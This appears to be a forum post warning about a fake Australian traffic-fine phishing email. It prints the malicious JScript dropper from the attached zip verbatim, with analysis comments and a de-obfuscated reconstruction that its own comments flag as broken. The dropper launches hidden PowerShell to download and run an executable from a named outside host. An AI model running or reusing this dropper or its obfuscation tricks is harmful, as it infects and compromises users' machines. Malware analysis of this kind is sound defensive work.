Via email:
This (and its variants) has been doing the rounds for nearly 2 years.

You have been detected with a traffic infringement:
Details: negligent driving
Infringement No: 788725081
Date of infringement: 28/10/2016
Amount due: 575.30 AUD
This fine will be forwarded by mail to your address. However you can check it now, please press here Photo Proof - 009150526
https://www.google.co.nz/?gws_rd=ssl#q= ... m&start=10
The `photo proof` link leads directly to a zipped file download via this website: ekonisenerji.com/photo%20proof%20-%20pay%20up%20to%2023-2016.zip
Inside the zip file is a JavaScript code file (it is written for Windows Script Host, as the ActiveXObject calls below show):
// --- Sample as delivered inside the zip: a Windows Script Host (JScript) dropper. ---
// Kept verbatim for analysis only; it is not meant to be run. The two COM host
// objects created here are the detection points a defender would look for:
// wscript.exe instantiating Shell.Application and WScript.Shell. The ProgIDs are
// written in mixed case, which is valid and defeats naive case-sensitive string matching.
var hdEJzSs = new ActiveXObject("shell.aPplIcatIon");
var pmMgJBu = new ActiveXObject("wscRipt.sHell");
// Payload string padded with a filler character. With the filler stripped it
// becomes a ShellExecute("cmd.exe", ...) call that launches powershell.exe with
// "-executionpolicy bypass -noprofile -windowstyle hidden", downloads a file into
// %AppData% via System.Net.WebClient.DownloadFile and then Start-Process-es it.
var Paqoxmd = 'hdEJzSsN.ShNeNlNlExNeNcNuteN(N"NCMND.NENxEN",N "/cN NpNingN NlNoNcalNhoNsNt N& pNoNwNerNsNhelNlN.NexNeN N-NexNeNcutNionpNoliNcNy NbNyNpNassN N-NnNopNrNofNiNlNeN -wiNndNowNsNtyNlNe hNiNdNdenN (nNewN-oNbNjeNcNtN systeNmN.nNetN.NwNebclient).dowNnlNoNaNdNfile(\'htNtp://stNr.dnoNdaNiNlyneNwNsN.Nxyz/YGRXtqNmNTNhNL.NpNhp\',\'N%ApNpNDNaNtAN%NvNxNjN12.exe\')N; NstANrNTN-pNrONcNeNsNs \'N%ANPNpdNaNtNAN%NvNxjN1N2N.EXe\'N",N "",N N"NoNpNeNnN",N 0N);';
// Registry value path obfuscated the same way, using "X" as filler; after the
// replace it reads HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot.
var cXKvEMeJ = ("XHXKXLM\\sXoXFXtXwXAre\\mXiXCRXoXsoXfT\\WXinXDXOXwXS XNt\\cXUrXrXEnTVXerXsXioN\\sXyXsteXmXrOXot").replace(/\X/g, "");
// 303769500/60753900 === 5, so this takes character index 5 of the SystemRoot
// value read from the registry and upper-cases it. On a host where SystemRoot
// is "C:\WINDOWS" that character is "N" (NOTE(review): depends on the host's
// value; the filler in Paqoxmd above is "N", so that is what the author assumes).
// The line that follows removes that character from Paqoxmd with a RegExp built
// without the "i" flag (so only the upper-case form is stripped and the lower-case
// "n" in "ping", "new-object", "hidden" survives) and executes the result via
// new Function — that is the actual execution point.
var JGWXrUoR = pmMgJBu.RegRead(cXKvEMeJ).charAt(303769500/60753900).toUpperCase();
(new Function(Paqoxmd.replace(RegExp(JGWXrUoR, "g"), "")))();
The third `var` line is padded with multiple `N` characters, the fourth with `X`, and the fifth with a `g`.
Remove those letters and you're left with:
// --- Author's manual reconstruction of the de-obfuscated sample. Illustrative only. ---
// NOTE(review): this listing is not runnable JScript and does not match what the
// original would execute: every letter has been lower-cased ("new function",
// "activexobject" are not the real identifiers), the regex literal on the
// registry line is unterminated, and every "n"/"N" was removed rather than only
// the character the runtime derives (the original builds a case-sensitive RegExp
// from an upper-cased registry character), so "ping", "-noprofile", "-windowstyle
// hidden", "new-object", "system.net.webclient", "downloadfile" and "open" have
// lost a letter here. The variable names in the registry lines also no longer
// agree ("ckvemej" vs "cxkvemej"). Read it for the intent, not as a reference.
var hdejzss = new activexobject("shell.application");
var pmmgjbu = new activexobject("wscript.shell");
// Intent: cmd.exe -> powershell.exe with execution-policy bypass, hidden window,
// download to %AppData% and execute.
var paqoxmd = 'hdejzss.shellexecute("cmd.exe", "/c pig localhost & powershell.exe -executiopolicy bypass -oprofile -widowstyle hidde (ew-object system.et.webcliet).dowloadfile(\'http://str.dodailyews.xyz/ygrxtqmthl.php\',\'%appdata%vxj12.exe\'); start-process \'%appdata%vxj12.exe\'", "", "ope", 0);';
// Intent: registry path of HKLM\...\Windows NT\CurrentVersion\SystemRoot.
var ckvemej = ("hklm\\software\\microsoft\\windows nt\\currentversion\\systemroot").replace(/\/g, "");
// Intent: the filler character is derived from the SystemRoot value at runtime.
var jgwxruor = pmmgjbu.regread(cxkvemej).charat(303769500/60753900).touppercase();
// Intent: strip the filler and execute the decoded command string.
(new function(paqoxmd.replace(regexp(jgwxruor, "g"), "")))();